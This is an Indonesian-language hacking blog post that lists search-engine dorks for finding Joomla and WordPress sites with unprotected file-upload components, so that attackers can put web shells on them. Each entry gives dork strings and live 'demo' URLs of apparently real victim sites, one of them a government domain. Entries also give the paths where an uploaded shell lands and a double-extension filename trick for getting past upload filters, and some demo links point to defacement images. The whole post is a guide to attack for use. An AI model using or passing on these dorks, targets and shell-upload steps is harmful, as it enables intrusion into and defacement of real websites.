Exploit Tamper Data ( ada Joomla Dan Wordpress )
Minggu, 21 Juli 2013
Add Comment
Thama Blog - Hai kali ini saya akan share beberapa dork untuk Exploit Joomla maupun Wordpress, ok tanpa basa basi langsung saja ya
1. Joomla Componen com_smartformer
[ dork ]
inurl:index.php?option=com_smartformer inurl:itemid= intext:Upload
[ demo ]
http://www.goodarch2u.com.my/index.php?option=com_smartformer&Itemid=439&lang=en
http://www.finenge.com/en/index.php?option=com_smartformer&Itemid=90
[ shell location ]
site/components/com_smartformer/files/yournameshell.php
[ details ]
http://1337day.com/exploit/19825
2. Plugin Wordpress Zarzadzanie Kontem (Ajax File Manager)
[ dork ]
inurl:"ajaxfilemanager.php?page=" intitle:ajax file manager
[ demo ]
http://www.madiunkab.go.id/qwerty/filemanager/ajaxfilemanager.php?page=3
http://www.hacker-motor.com/javascript/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php?page=5
3.Wp- Plugin "tdo-mini-form"
[ dork ]
inurl:tdomf-upload-inline.php?tdomf_form_id= intext:Upload
[ link upload file ]
site/wp-content/uploads/tdomf/tmp/$tdomf_form_id(value)/$user_agent(IP)/$filename.PHP;.jpg
[ example ]
wp-content/uploads/tdomf/tmp/1/127.0.0.1/z3ro.PHP;.jpg
[ demo ]
http://www.tutufoundationusa.org/wp-content/plugins/tdo-mini-forms/tdomf-upload-inline.php?tdomf_form_id=1&index=
[ details ]
http://1337day.com/exploit/19776
4.JQuery File Upload
[ dork ]
intitle:upload intext:Add files.. "Start upload" Cancel upload Delete
[ vuln ]
http://konceptsigngroup.com/jQuery-FileUpload/index.html
[ demo ]
http://konceptsigngroup.com/jQuery-FileUpload/server/php/thumbnails/anonymous%20muslim.jpg
5. Upload Tiny Browser
[new dork ]
inurl:tinybrowser/upload.php
intitle:Index of / intext:Parent Directory "tinybrowser/"
inurl:/tinybrowser/ intitle:TinyBrowser :: ext:php
inurl:tinybrowser/upload.php intext:Enviar Arquivos intitle:TinyBrowser :: Upload
inurl:type=image& intext:Enviar Arquivos intitle:TinyBrowser :: Upload
[ demo ]
http://www.maspa.com.br/clientes/lj/admin/js/tiny_mce/plugins/tinybrowser/upload.php
[ example ]
http://www.maspa.com.br/uploads/images/_thumbs/_anonymous_muslims.jpg
[ details ]
http://1337day.com/exploit/19732
6. Joomla File Upload "com_autostand"
[dork ]
inurl:index.php?option=** func=newItem intext:Select Image Add a Car
inurl:index.php?option=** func=newItem intext:Select Image Publish Only available to admin
inurl:index.php?option=com_autostand
[ poc ]
site/inurl:index.php?option=com_autostand&func=newItem
[ demo ]
http://www.karahan.be//index.php?option=com_autostand&func=newItem
TAMPER DATA & SHELL UPLOAD
1. Plugin Spot Light
[ dork ]
intitle:index of /../plugins/spotlightyour/monetize/ intext:Parent Directory "upload/"
inurl:wp-content monetize/upload/ intext:Uploading Please wait ... Uploaded Successfully.
inurl:wp-content/plugins/spotlightyour/
[ exploit ]
http://site/wp-content/plugins/spotlightyour/monetize/upload/
[ shell access ]
wp-content/uploads/[year]/[month]/[search your shell].php
[ example ]
http://pure-cashmere-pashmina-scarves.com/wp-content/plugins/spotlightyour/monetize/upload/
0 Response to "Exploit Tamper Data ( ada Joomla Dan Wordpress )"
Posting Komentar